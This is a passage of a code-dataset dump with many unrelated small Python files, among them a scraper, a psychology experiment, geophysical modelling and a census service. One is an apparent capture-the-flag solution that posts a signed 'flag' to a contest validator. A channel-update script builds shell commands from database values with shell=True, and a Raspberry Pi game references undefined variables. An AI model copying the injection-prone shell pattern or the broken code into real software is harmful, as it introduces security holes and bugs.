receiver.start()\n","sub_path":"core/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"241131212","text":"import os\nimport csv\n\n\ndef write_apartments(dirname, city, data):\n try:\n os.makedirs(dirname)\n except OSError as e:\n pass\n filename = f\"{dirname}/{city}.tsv\"\n try:\n with open(filename, mode='a', encoding='UTF-8', newline='') as output_file:\n writer = csv.DictWriter(output_file, delimiter='\\t', fieldnames=data[0].keys())\n if os.stat(filename).st_size == 0:\n writer.writeheader()\n for item in data:\n writer.writerow(item)\n except IOError:\n print('I/O Error')\n\n\ndef write_cadastres(dirname, city, data):\n try:\n os.makedirs(dirname)\n except OSError as e:\n pass\n filename = f\"{dirname}/{city}.csv\"\n try:\n with open(filename, mode='a', encoding='UTF-8', newline='') as output_file:\n writer = csv.writer(output_file, lineterminator='\\n')\n for item in data:\n writer.writerow([item, ])\n except IOError:\n print(\"I/O Error\")\n\n\ndef write_addresses(dirname, city, data):\n try:\n os.makedirs(dirname)\n except OSError as e:\n pass\n filename = f\"{dirname}/{city}.txt\"\n try:\n with open(filename, mode='w', encoding='UTF-8') as output_file:\n output_file.writelines(\"%s\\n\" % item for item in data)\n except IOError as e:\n print(e)\n\n\ndef get_cadastres(dirname, city):\n filename = f\"{dirname}/{city}.csv\"\n data = []\n try:\n with open(filename, mode='r', encoding='UTF-8', newline='') as input_file:\n reader = csv.reader(input_file, lineterminator='\\n')\n for cadastre in reader:\n data.append(cadastre[0])\n except IOError:\n print(\"I/O Error\")\n return data\n\n\ndef get_addresses(dirname, city):\n filename = f\"{dirname}/{city}.txt\"\n data = []\n try:\n with open(filename, mode='r', encoding='UTF-8') as input_file:\n data = [item.rstrip() for item in input_file.readlines()]\n except IOError:\n print(\"I/O Error\")\n return data\n","sub_path":"utils/file_helper.py","file_name":"file_helper.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"229408730","text":"# -*- coding: utf-8 -*-\nimport re\nfrom get_chinese_meaning import get_chinese\nfrom get_sentence import get_sentence\n\n# read the file\n# f_name = input('input the essay file name')\nf_name = 'Untitled.txt'\nwith open(f_name, 'r') as f_read:\n essay_content = f_read.read()\nfilter_essay_list = [i for i in essay_content if i.isalpha() is True or i == ' ']\nfilter_essay = ''.join(filter_essay_list)\nfilter_essay = filter_essay.lower()\nsplit_words = filter_essay.split(' ')\nsplit_words = [i for i in split_words if i != '']\n\n# get already know words\nwith open(\"already_know.txt\", 'r') as already_know:\n already_know = already_know.read()\n# sort out the file\nalready_know = already_know.replace(' ', ',')\nalready_know = already_know.replace(',', '\\n')\nalready_know = already_know.split('\\n')\nalready_know = list(set(already_know)) # remove duplicate words\nalready_know = sorted(already_know)\n\nalready_know_sort = ''\nfor i in already_know:\n already_know_sort += i + '\\n'\nwith open(\"already_know.txt\", 'w') as f: # 刷新已知单词文件\n f.write(already_know_sort)\n\n# filter already know words\n# Descending sort list\nfilter_words = [i for i in split_words if i not in already_know]\n\ndic = {}\nfor i in filter_words:\n if i in dic:\n dic[i] += 1\n else:\n dic[i] = 1\n\nsort_dic = sorted(dic.items(), key=lambda x: x[1], reverse=True) # sort the dictionary\n\n# output words and frequency\n# for word, frequency in sort_dic:\n# print(word, frequency)\n\nprint(sort_dic)\nif __name__ == '__main__':\n index = 0\n while index != len(sort_dic):\n print(index + 1, get_chinese(sort_dic[index][0]))\n print('出现次数:' + str(sort_dic[index][1]))\n sentence_list = get_sentence(sort_dic[index][0], essay_content)\n sentence_index = 1\n for i in sentence_list:\n print(\"例句{}\".format(sentence_index), i)\n sentence_index += 1\n if sentence_index == 5:\n break\n print('=' * 40)\n index += 1\n","sub_path":"get_words_frequency.py","file_name":"get_words_frequency.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"303074415","text":"#!/usr/bin/python\r\nimport MySQLdb, os, subprocess\r\n\r\nxmltv = \"/opt/mc2xml/xmltv.xml\"\r\n\r\nvars = dict()\r\n\r\nwith open(os.path.expanduser('~') + \"/.mythtv/mysql.txt\", \"r\") as f:\r\n for line in f:\r\n if not line.startswith('#'):\r\n eq_index = line.find('=')\r\n var_name = line[:eq_index].strip()\r\n var_value = line[eq_index + 1:].strip()\r\n vars[var_name] = var_value\r\n\r\ndb = MySQLdb.connect (host = vars['DBHostName'],\r\n user = vars['DBUserName'],\r\n passwd = vars['DBPassword'],\r\n db = vars['DBName'])\r\n\r\nreader = db.cursor()\r\nupdate = db.cursor()\r\n\r\nreader.execute(\"SELECT callsign FROM channel\")\r\n\r\nfor x in range(0, int(reader.rowcount)):\r\n row = reader.fetchone()\r\n callsign = row[0]\r\n cmd = \"grep -3 \\>\" + callsign + \"\\< \" + xmltv + \" | grep id | cut -f2 -d'\\\"'\"\r\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)\r\n (output, err) = p.communicate()\r\n exitcode = p.wait()\r\n r = update.execute(\"\"\"UPDATE mythconverg.channel SET xmltvid = %s WHERE callsign=%s\"\"\", (output.strip(), callsign))\r\n","sub_path":"mythtv/mc2xml/updateChannels.py","file_name":"updateChannels.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"619809849","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\n\nclass BestMoviesSpider(CrawlSpider):\n name = 'best_movies'\n allowed_domains = ['www.imdb.com']\n start_urls = ['https://www.imdb.com/chart/top/?ref_=nv_mv_250']\n\n rules = (\n Rule(LinkExtractor(\n restrict_xpaths=\"//tbody[@class='lister-list']/tr\"), callback='parse_item', follow=True),\n )\n\n def parse_item(self, response):\n yield {\n 'title': response.xpath(\"//div[@class='TitleBlock__TitleContainer-sc-1nlhx7j-1 jxsVNt']/h1/text()\").get(),\n 'year': response.xpath(\"//div[@class='TitleBlock__TitleMetaDataContainer-sc-1nlhx7j-2 hWHMKr']/ul/li[1]/span/text()\").get(),\n 'duration': response.xpath(\"//div[@class='TitleBlock__TitleMetaDataContainer-sc-1nlhx7j-2 hWHMKr']/ul/li[3]/text()\").get(),\n 'genre': response.xpath(\"//a[@class='GenresAndPlot__GenreChip-cum89p-3 fzmeux ipc-chip ipc-chip--on-baseAlt']/span/text()\").get(),\n 'rating': response.xpath(\"//div[@class='AggregateRatingButton__ContentWrap-sc-1ll29m0-0 hmJkIS']/div/span[1]/text()\").get(),\n 'movie_url': response.url,\n }\n","sub_path":"imdb/spiders/best_movies.py","file_name":"best_movies.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"265325053","text":"#https://www.interviewbit.com/problems/max-product-subarray/\nclass Solution:\n # @param A : tuple of integers\n # @return an integer\n def maxProduct(self, A):\n n = len(A)\n max_here = 1\n min_here = 1\n max_all = -float(\"inf\")\n for i in range(n):\n if A[i]>0:\n max_here *=A[i]\n min_here = min(min_here*A[i],1)\n elif A[i]==0:\n max_here = 0\n min_here = 1 \n else:\n temp = max_here\n max_here = min_here*A[i]\n min_here = temp*A[i]\n max_all = max(max_here,max_all)\n if max_here<=0:\n max_here = 1\n return max_all\n \n","sub_path":"DP/max-product-subarray.py","file_name":"max-product-subarray.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"309544349","text":"#Bubble Sort - Runtime of O(n^2)\n\n#!/bin/python3\n\nimport sys\n\n\nn = int(input().strip())\na = [int(a_temp) for a_temp in input().strip().split(' ')]\n\nnumSwaps = 0\n\na = list(map(int, a))\n \nfor j in range(1, n):\n for i in range(1, n):\n if a[i] < a[i-1]:\n a[i], a[i-1] = a[i-1], a[i]\n numSwaps += 1\n \n\n\nprint(\"Array is sorted in \" + str(numSwaps) + \" swaps.\")\nprint(\"First Element: \" + str(a[0]))\nprint(\"Last Element: \" + str(a[-1]))\n\n","sub_path":"30 Days of Code/day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"200064124","text":"import rospy\nimport numpy as np\nfrom sawyer.ros.envs.sawyer import ToyEnv\n\nrospy.init_node('test_toy_env')\ntoy_env = ToyEnv(simulated=False, control_mode='task_space')\n\naction = np.array([0.1, 0, 0, 0])\n\ni = 0\nwhile i < 2:\n obs, r, done, info = toy_env.step(action)\n print(obs) \n print(r)\n print(done)\n print(info)\n i += 1\n\ntoy_env.reset()\n","sub_path":"sawyer/ros/tests/test_toy_env.py","file_name":"test_toy_env.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"139210374","text":"import psychopy\r\nimport psychopy.gui\r\nimport xlrd\r\nimport random\r\nfrom random import randint\r\nfrom psychopy import core, visual, data, event, logging, clock\r\n# instructions experimental block of reward condition (soothe the baby)\r\nINSTRUCTIONS_REWARD_EXP = \"\"\"\r\n Over the fixation point will be presented a distressed baby face, \r\n your task is to soothe the baby with one of the 2 toys available. \r\n One of the two is more successful and it will make the baby stop crying or being happy! \r\n the other one will not produce any change.\r\n use left and right arrow to select the toy you think is better and try to soothe the baby as much as possible!\r\n Pay attention, the good toy may change!\r\n\r\n Good luck!\r\n\r\n Press 'space' to begin.\r\n \"\"\"\r\n\r\n# instructions experimental block of punishment condition (excite the baby)\r\nINSTRUCTIONS_PUNISHMENT_EXP = \"\"\"\r\n Over the fixation point will be presented a neutral baby face, \r\n your task is to make the baby happy with one of the 2 toys available. \r\n One of the two is more successful and it will make the baby being happy! \r\n the other might have no effect or even distress the baby!\r\n use left and right arrow to select the toy you think is better and try to make the baby as much as possible!\r\n Pay attention, the good toy may change!\r\n\r\n Good luck!\r\n\r\n Press 'space' bar to begin.\r\n \"\"\"\r\n\r\nNUM_TRIALS = 200\r\n\r\ndef init_elements_in_window():\r\n window = init_window()\r\n pos_right = [200, -200]\r\n pos_left = [-200, -200]\r\n toy_size = [200, 200]\r\n face_size = [150, 200]\r\n fixationcross_size = [50, 50]\r\n rectangle_right = psychopy.visual.Rect(win=window, units=\"pix\", width=toy_size[0] + 10, height=toy_size[1] + 10,\r\n lineColor='green', colorSpace='rgb', pos=pos_right)\r\n rectangle_left = psychopy.visual.Rect(win=window, units=\"pix\", width=toy_size[0] + 10, height=toy_size[1] + 10,\r\n lineColor='green', colorSpace='rgb', pos=pos_left)\r\n toy_bear = psychopy.visual.ImageStim(win=window, image=\"toy1_bear.png\", color=(1.0, 1.0, 1.0), size=toy_size,\r\n units='pix',\r\n pos=pos_right)\r\n toy_duck = psychopy.visual.ImageStim(win=window, image=\"toy2_duck.png\", color=(1.0, 1.0, 1.0), size=toy_size,\r\n units='pix',\r\n pos=pos_left)\r\n happyface = psychopy.visual.ImageStim(win=window, image=\"babyhappy2.png\", color=(1.0, 1.0, 1.0),\r\n size=face_size,\r\n units='pix', pos=[0, 200])\r\n neutralface = psychopy.visual.ImageStim(win=window, image=\"babyneutral2.png\", color=(1.0, 1.0, 1.0),\r\n size=face_size,\r\n units='pix', pos=[0, 200])\r\n sadface = psychopy.visual.ImageStim(win=window, image=\"babyneg2.png\", color=(1.0, 1.0, 1.0), size=face_size,\r\n units='pix', pos=[0, 200])\r\n fixation_cross = psychopy.visual.ImageStim(win=window, image=\"fixation_cross.png\", color=(1.0, 1.0, 1.0),\r\n size=fixationcross_size, units='pix', pos=[0, 200])\r\n\r\n right_highlight = psychopy.visual.Rect(win=window, pos=pos_right, width=250, height=250, color=(0.0, 1.0, 0.0),\r\n units='pix')\r\n\r\n left_highlight = psychopy.visual.Rect(win=window, pos=pos_left, width=250, height=250, color=(0.0, 1.0, 0.0),\r\n units='pix')\r\n\r\n return window, rectangle_right, rectangle_left, toy_bear, toy_duck, happyface, neutralface, sadface, fixation_cross, right_highlight, left_highlight\r\n\r\n\r\ndef init_window():\r\n screen_size = [1000, 1000]\r\n window = psychopy.visual.Window(\r\n units='pix',\r\n size=screen_size,\r\n fullscr=False,\r\n # change in True when you run the actual experiment and change the screen size into the actual size of the screen of the pc you will use\r\n color=[0, 0, 0])\r\n return window\r\n\r\n\r\ndef show_dialog_and_get_info():\r\n print(\"show_dialog...\")\r\n gui = psychopy.gui.Dlg()\r\n gui.addField(\"Participant Name:\", \"Ilaria\")\r\n gui.addField(\"Condition Number:\", 1)\r\n gui.addField(\"Age:\", 26)\r\n gui.addField(\"Gender(m/f/o):\", \"f\")\r\n # this is a blocking function. as long as the participant has not clicked ok the code progression\r\n # will be blocked here\r\n gui.show()\r\n participant_number = gui.data[0]\r\n cond_num = int(gui.data[1])\r\n age = int(gui.data[2])\r\n gender = (gui.data[3])\r\n return participant_number, cond_num, age, gender\r\n\r\n\r\ndef get_random_instructions(instruction_list):\r\n result = random.choice(instruction_list)\r\n text = result[0]\r\n id = result[1]\r\n print(\"instruction text is %s. id is %s\" % (text, id))\r\n return text, id\r\n\r\n\r\ndef show_instructions_and_wait(window):\r\n instruction_list = [(INSTRUCTIONS_REWARD_EXP, True), (INSTRUCTIONS_PUNISHMENT_EXP, False)]\r\n instructions_text, is_reward = get_random_instructions(instruction_list)\r\n text_stim = psychopy.visual.TextStim(\r\n win=window,\r\n text=instructions_text,\r\n color=(-1, -1, -1), height=30.0)\r\n text_stim.draw(window)\r\n window.flip()\r\n psychopy.event.waitKeys(keyList=['space'])\r\n print(\"user pressed space -> go to next step !\")\r\n return is_reward\r\n\r\n\r\ndef experiment_trial(is_reward, window, right_highlight, left_highlight, toy1, toy2, happy_face, neutral_face, sad_face):\r\n print(\"start experiment trial with is_reward=%s...\" % is_reward)\r\n fixation_cross.draw(window)\r\n window.flip()\r\n core.wait(1)\r\n print(\"waited 1 seconds.\")\r\n fixation_cross.draw(window)\r\n window.flip()\r\n core.wait(1)\r\n # remove fixation cross\r\n window.flip()\r\n # right_highlight.draw(window)\r\n toy1.draw(window)\r\n toy2.draw(window)\r\n window.flip()\r\n\r\n response = psychopy.event.waitKeys(keyList=['left', 'right'])\r\n print(response)\r\n # highlight selected items\r\n pressed_left = None\r\n if 'left' in response:\r\n pressed_left = True\r\n left_highlight.draw(window)\r\n toy2.draw(window)\r\n toy1.draw(window)\r\n if 'right' in response:\r\n pressed_left = False\r\n right_highlight.draw(window)\r\n toy1.draw(window)\r\n toy2.draw(window)\r\n window.flip()\r\n\r\n # decide what baby face to display to user\r\n process_result_and_wait(window, happy_face, neutral_face, sad_face, pressed_left, left_highlight, right_highlight, toy1, toy2)\r\n\r\n\r\ndef process_result_and_wait(window, happy_face, neutral_face, sad_face, pressed_left, left_highlight, right_highlight, toy1, toy2):\r\n #redraw previous state\r\n if pressed_left:\r\n left_highlight.draw(window)\r\n toy2.draw(window)\r\n toy1.draw(window)\r\n else:\r\n right_highlight.draw(window)\r\n toy1.draw(window)\r\n toy2.draw(window)\r\n\r\n #decide which baby face to display\r\n random_id = randint(1, 3)\r\n if random_id == 1:\r\n happy_face.draw(window)\r\n if random_id == 2:\r\n neutral_face.draw(window)\r\n if random_id == 3:\r\n sad_face.draw(window)\r\n\r\n window.flip()\r\n core.wait(3)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"start experiment...\")\r\n participant_number, cond_num, age, gender = show_dialog_and_get_info()\r\n print(\"participant name is %s, cond_num is %d, age is %d, gender is %s.\"\r\n % (participant_number, cond_num, age, gender))\r\n\r\n window, rectangle_right, rectangle_left, toy_bear, toy_duck, happy_face, neutral_face, sad_face, fixation_cross, right_highlight, left_highlight = init_elements_in_window()\r\n print(\"windows elements are ready for use.\")\r\n\r\n is_reward = show_instructions_and_wait(window)\r\n\r\n cpt_iteration = 0\r\n while True:\r\n experiment_trial(is_reward, window, right_highlight, left_highlight, toy_bear, toy_duck, happy_face, neutral_face, sad_face)\r\n cpt_iteration += 1\r\n print(\"%d experiment trials has been performed.\" % cpt_iteration)\r\n\r\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":8269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"27658987","text":"import requests\nimport ed25519\n\nseed = open(\"key.bin\", \"rb\").read()\nprivKey = ed25519.SigningKey(seed)\n\nmsg = b'flag'\nsignature = privKey.sign(msg)\n\nresp = requests.post('https://validator.ecsc22.hack.cert.pl/', json={\n\t\"id\": msg.decode(),\n\t\"signature\": list(signature)\n})\n\nprint(resp.status_code)\nprint(resp.text)\n","sub_path":"ecsc_2022/validator/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"337829741","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 23 21:33:32 2020\n\n@author: chens\n\"\"\"\nimport scipy.io as sio\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom geoist import gridder\nfrom geoist.inversion import geometry\nfrom geoist.pfm import prism, giutils\nfrom geoist.inversion.mesh import PrismMesh\nfrom geoist.vis import giplt\n\nfname1 = \"D:\\\\projects\\\\model1-2-to-Jin-Chen\\\\rho1.mat\"\n#fname2 = \"D:\\\\projects\\\\model1-2-to-Jin-Chen\\\\rho2.mat\"\ndata1=sio.loadmat(fname1)\n#data2=sio.loadmat(fname2)\nrho10 = data1['data_dens']\n#rho2 = data2['data_dens2']\nrho1 = rho10[::7,::10]\nmaglist = [12.0, 5.0, 2.0, 6.0]\nmag1 = rho1.copy()\nfor i, di in enumerate(set(rho1.ravel())):\n print(di, maglist[i])\n mag1[rho1 == di] = maglist[i]\n \n\nplt.figure()\nplt.imshow(rho1)\n\nplt.figure()\nplt.imshow(mag1)\n#plt.figure()\n#plt.imshow(rho2) #, origin='lower')\n\nmeshfile = r\"d:\\msh1.txt\"\ndensfile = r\"d:\\den1.txt\"\nmagfile = r\"d:\\mag1.txt\"\ngraoutfile = r\"d:\\gra1.dat\"\nmagoutfile = r\"d:\\mag1.dat\"\ngraoutfile1 = r\"d:\\gra1n.dat\"\nmagoutfile1 = r\"d:\\mag1n.dat\"\narea = (-100, 100, -750, 750, 0, 700) #x y z\nshape = (100, 150, 1) # z y x\nmesh = PrismMesh(area, shape)\nmesh.addprop('density', 1000.*rho1.ravel()-2529.99997)\nmesh.addprop('magnetization', mag1.ravel())\nmesh.dump(meshfile, densfile, 'density')\nmesh.dump(meshfile, magfile, 'magnetization') #输出网格到磁盘,MeshTools3D可视化\n# #生成核矩阵\nkernel=[] \nnarea = (-500, 500,-1000, 1000) #y x\nnshape = (20, 40)\nxp, yp, zp = gridder.regular(narea, nshape, z=-1)\nprisms=[]\nfor p in mesh:\n prisms.append(p)\nprint('kernel')\ninc, dec = 30, -4\nkernelgz = prism.gz_kernel(xp, yp, zp, prisms)\nfor i, layer in enumerate(mesh.layers()):\n for j, p in enumerate(layer):\n x1 = mesh.get_layer(i)[j].x1\n x2 = mesh.get_layer(i)[j].x2\n y1 = mesh.get_layer(i)[j].y1\n y2 = mesh.get_layer(i)[j].y2\n z1 = mesh.get_layer(i)[j].z1\n z2 = mesh.get_layer(i)[j].z2\n den = mesh.get_layer(i)[j].props\n model=[geometry.Prism(x1, x2, y1, y2, z1, z2, \n {'magnetization': giutils.ang2vec(1, inc, dec)})]\n field = prism.tf(xp, yp, zp, model, inc, dec)\n kernel.append(field) \n \nkk=np.transpose(kernel) #kernel matrix for inversion, 500 cells * 400 points\nfield_mag=np.mat(kk)*np.transpose(np.mat(mag1.ravel()))\nfield_gra=np.mat(kernelgz)*np.transpose(np.mat(rho1.ravel()))\nfield_mag1 = giutils.contaminate(np.array(field_mag).ravel(), 0.05, percent = True)\nfield_gra1 = giutils.contaminate(np.array(field_gra).ravel(), 0.05, percent = True)\n\n#保存正演异常\nwith open(graoutfile, 'w') as f:\n f.write('! model 1 gravity anomlay (mGal)\\n')\n f.write('{}\\n'.format(len(field_gra)))\n for i in range(len(field_gra)):\n f.write('{} {} {} {}\\n'.format(yp[i],xp[i],zp[i],np.array(field_gra[i]).ravel()[0]))\n \nwith open(magoutfile, 'w') as f:\n f.write('! model 1 magtotal-field magnetic anomaly (nT)\\n')\n f.write('{}\\n'.format(len(field_mag)))\n for i in range(len(field_mag)):\n f.write('{} {} {} {}\\n'.format(yp[i],xp[i],zp[i],np.array(field_mag[i]).ravel()[0]))\n \nwith open(graoutfile1, 'w') as f:\n f.write('! model 1 gravity anomlay (mGal) with 5% noise\\n')\n f.write('{}\\n'.format(len(field_gra1)))\n for i in range(len(field_gra1)):\n f.write('{} {} {} {}\\n'.format(yp[i],xp[i],zp[i],np.array(field_gra1[i]).ravel()[0]))\n \nwith open(magoutfile1, 'w') as f:\n f.write('! model 1 magtotal-field magnetic anomaly (nT) with 5% noise\\n')\n f.write('{}\\n'.format(len(field_mag1)))\n for i in range(len(field_mag1)):\n f.write('{} {} {} {}\\n'.format(yp[i],xp[i],zp[i],np.array(field_mag1[i]).ravel()[0]))\n \n \n#画图\nplt.figure(figsize=(16, 16))\nplt.subplot(2, 2, 1)\nplt.axis('scaled')\nplt.title('model 1 gravity anomlay (mGal)')\nlevels = giplt.contourf(yp , xp , field_gra, nshape, 15)\ncb = plt.colorbar(orientation='horizontal')\ngiplt.contour(yp, xp, field_gra, nshape,\n levels, clabel=False, linewidth=0.1)\nplt.subplot(2, 2, 2)\nplt.axis('scaled')\nplt.title('model 1 magtotal-field magnetic anomaly (nT)')\nlevels = giplt.contourf(yp , xp , field_mag, nshape, 15)\ncb = plt.colorbar(orientation='horizontal')\ngiplt.contour(yp, xp, field_mag, nshape,\n levels, clabel=False, linewidth=0.1)\n\nplt.subplot(2, 2, 3)\nplt.axis('scaled')\nplt.title('model 1 gravity anomlay (mGal) with 5% noise')\nlevels = giplt.contourf(yp , xp , field_gra1, nshape, 15)\ncb = plt.colorbar(orientation='horizontal')\ngiplt.contour(yp, xp, field_gra1, nshape,\n levels, clabel=False, linewidth=0.1)\nplt.subplot(2, 2, 4)\nplt.axis('scaled')\nplt.title('model 1 magtotal-field magnetic anomaly (nT) with 5% noise')\nlevels = giplt.contourf(yp , xp , field_mag1, nshape, 15)\ncb = plt.colorbar(orientation='horizontal')\ngiplt.contour(yp, xp, field_mag1, nshape,\n levels, clabel=False, linewidth=0.1)\nplt.tight_layout()\nplt.show()","sub_path":"examples/matlab_bin.py","file_name":"matlab_bin.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"469439349","text":"import RPi.GPIO as GPIO\nimport time\nimport shelve\nimport random\n\nGPIO.setmode(GPIO.BCM)\n\nleds = [6, 5, 22, 27, 17]\nbutton1 = 24\nposition = 0\nincrement = 1\nscore = 0\nmaxScore = 5\n\nGPIO.setup(leds, GPIO.OUT, initial = 0)\nGPIO.setup(button1, GPIO.IN)\n\ndef flash(channel):\n for i in range(0,5):\n GPIO.output(leds[position], True)\n time.sleep(.1)\n GPIO.output(leds[position], False)\n time.sleep(.1)\n \nGPIO.add_event_detect(button1, GPIO.FALLING, callback=flash, bouncetime = 1200)\n\ntry:\n print(\"REACT\")\n while score < maxScore:\n GPIO.output(leds[position], True)\n time.sleep(.5 / (1.1**score))\n if GPIO.event_detected(button1):\n presses += 1\n if position == 2:\n score += 1\n hits += 1\n print(\"Hit! Your score is\", score)\n time.sleep(1.1)\n else:\n score -= 1\n print(\"Miss! Your score is\", score)\n time.sleep(1.1)\n GPIO.output(leds[position], False)\n position += increment\n if position == 0 or position == 4:\n increment *= -1\nexcept KeyboardInterrupt:\n print(\"\")\nfinally:\n GPIO.cleanup()\n","sub_path":"react.py","file_name":"react.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"97472494","text":"import matplotlib.pyplot as plt\nimport sys\nimport spacy\nimport numpy\nfrom collections import Counter\n\nimport sys\nsys.path.append('..')\n\nimport import_data_json as import_json\nimport mine_location_descriptions_json as mine_json\n\nnlp = spacy.load('nl_core_news_sm')\n\ndef word_count(input_data):\n words = []\n total_article_n = len(input_data)\n for article_n in range(total_article_n):\n total_sentence_n = len(input_data[article_n])\n for sentence_n in range(total_sentence_n):\n total_span_n = len(input_data[article_n][sentence_n])\n for span_n in range(total_span_n):\n add_tokens = False\n for token in reversed(input_data[article_n][sentence_n][span_n]):\n if token.text[:3] == 'LOC':\n add_tokens = True\n elif add_tokens and not(token.is_punct) and not(token.text[:3] == 'LOC'): #(token.pos_ == 'ADP'):\n words.append(token.lower_)\n return words\n\ndata_200 = import_json.import_data_json('../../data/flitsservice_trainset.json', 200)\ndataY = import_json.import_data_json('../../data/flitsservice_trainset.json', filepath_complex='../../data/flitsservice_trainset.csv', complex='Y')\n\n\ninput_data_200 = mine_json.get_location_descriptions_json(data_200, nlp)\ninput_dataY = mine_json.get_location_descriptions_json(dataY, nlp)\n\nwords_200 = word_count(input_data_200)\nwordsY = word_count(input_dataY)\n\nword_freq_200 = Counter(words_200)\nword_freqY = Counter(wordsY)\n\nprint(input_dataY)\nprint(\"Length:\", len(input_dataY))\nkeysY, valuesY = zip(*word_freqY.most_common(35))\nvalues_200 = []\nfor key in keysY:\n values_200.append(word_freq_200.get(key, 0))\n\nvaluesY_norm = [x / len(wordsY) for x in valuesY]\nvalues_200_norm = [x / len(words_200) for x in values_200]\n\nplt.bar( numpy.arange(len(valuesY_norm)) * 3, height=valuesY_norm, width=1.2, color = 'lightskyblue' )\nplt.bar( numpy.arange(len(values_200_norm)) * 3 + 1.2, height=values_200_norm, width=1.2, color = 'lightsalmon' )\nplt.subplots_adjust(left=0.07, bottom=0.38, right=0.99,top=0.99)\nplt.xticks(numpy.arange(len(valuesY_norm)) * 3, keysY, rotation=80)\nplt.ylabel('Distribution')\nplt.xlabel('35 most common words')\nplt.legend(['Complex subset of first 200 trainingset articles', 'First 200 trainingset articles'],loc=1)\nplt.show()\n","sub_path":"implementation/data_visualizations/word_distr_complex_first200.py","file_name":"word_distr_complex_first200.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"575604354","text":"from datetime import datetime\nimport csv\n\nfrom taa.helpers import UnicodeCsvWriter\nfrom taa.core import DBService\nfrom taa.core import db\nfrom taa.services import RequiredFeature\nfrom models import CaseCensus\nfrom census_import import CensusRecordParser\n\n\nclass CensusRecordService(DBService):\n __model__ = CaseCensus\n\n self_enrollment_link_service = RequiredFeature(\"SelfEnrollmentLinkService\")\n\n def _preprocess_params(self, kwargs):\n \"\"\"\n Convert the date columns to plain dates, not datetimes, so we don't\n get spurious UPDATES when merging records\n \"\"\"\n from sqlalchemy.inspection import inspect\n inspector = inspect(CaseCensus)\n for c in inspector.columns:\n if (type(c.type) == db.Date and\n c.name in kwargs and\n isinstance(kwargs[c.name], datetime)):\n kwargs[c.name] = kwargs[c.name].date()\n return kwargs\n\n def export_csv(self, file, census_records):\n writer = UnicodeCsvWriter(file)\n # Write the header row\n writer.writerow(self.get_csv_headers())\n # Write all the data\n for record in census_records:\n writer.writerow(self.get_csv_row_from_db_row(record))\n return writer\n\n def get_csv_headers(self):\n return [field.csv_column_name\n for field in CensusRecordParser.all_possible_fields]\n\n def get_csv_row_from_db_row(self, census_record):\n return [getattr(census_record, field.database_name)\n for field in CensusRecordParser.all_possible_fields\n ]\n\n def get_csv_row_from_dict(self, census_record):\n return [census_record.get(field.database_name, '')\n for field in CensusRecordParser.all_possible_fields]\n\n def format_ssn(self, ssn):\n if not len(ssn) == 9:\n return ssn\n return '{}-{}-{}'.format(ssn[:3], ssn[3:5], ssn[5:])\n\n def merge_census_data(self, case, file_data, replace_matching):\n \"\"\"\n Updates existing records and adds new. Matches based on SSN, and depending on\n :replace_matching, will do replace matches or skip over them.\n \"\"\"\n # Get existing census data indexed by SSN for matching\n existing = self.find(case_id=case.id).all()\n \n # The `if r.employee_ssn` makes sure we aren't matching on empty SSNs if some census records are missing SSNs.\n existing_by_ssn = {r.employee_ssn: r for r in existing if r.employee_ssn}\n # Parse the uploaded file and validate it. If we are in add-only mode,\n # pass in the existing SSN dict.\n parser = CensusRecordParser(case)\n parser.process_file(file_data,\n error_if_matching=(existing_by_ssn if\n not replace_matching else None))\n # Do the merge\n added = []\n updated = []\n for record in parser.get_valid_data():\n if record['EMP_SSN'] in existing_by_ssn:\n if replace_matching:\n # Update Existing\n updated_record = self.update_without_save(\n existing_by_ssn[record['EMP_SSN']],\n **parser.get_db_dict(record))\n updated.append(updated_record)\n else:\n # We are in \"Add-only\" mode, an error will have been added\n # already for this record\n continue\n else:\n # Add new census record\n added.append(\n self.add_record_from_upload(case,\n **parser.get_db_dict(record)))\n # Only commit the changes if we had no errors\n if not parser.errors:\n db.session.flush()\n valid_records = added + updated\n return parser.errors, valid_records\n\n def replace_census_data(self, case, file_stream):\n # Process the upload before deleting the current data\n parser = CensusRecordParser(case)\n parser.process_file(file_stream)\n # Bail out if any errors\n if parser.errors:\n valid_records = []\n return parser.errors, valid_records\n # Delete existing records for this case\n self.remove_all_for_case(case)\n # Add all uploaded records\n valid_records = [\n self.add_record_from_upload(case, **parser.get_db_dict(record))\n for record in parser.get_valid_data()]\n db.session.flush()\n return parser.errors, valid_records\n\n def 